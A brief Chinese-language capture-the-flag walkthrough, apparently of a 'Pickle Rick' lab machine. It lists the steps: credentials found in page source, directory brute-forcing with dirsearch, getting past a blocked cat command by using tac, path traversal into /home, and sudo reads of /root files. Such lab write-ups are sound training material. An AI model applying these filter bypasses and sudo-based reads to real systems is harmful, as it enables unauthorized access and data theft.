登陆到网站
查看页面源代码
发现重要信息
Username: R1ckRul3s
使用dirsearch
分别打开
发现登录框,猜测Wubbalubbadubdub为密码,结合在源代码里找到的用户名,登录
ls
发现目标
cat Sup3rS3cretPickl3Ingred.txt
cat被禁用了
更换其他命令
tac Sup3rS3cretPickl3Ingred.txt
成功
继续打开其他文件找寻有用信息
发现部分命令被禁用
在系统文件中寻找其他成分
ls ../../../home
发现目标信息 rick
ls ../../../home/rick
tac ../../../home/rick/"second ingredients"
成功
继续寻找
sudo ls ../../../root
sudo tac ../../../root/3rd.txt
成功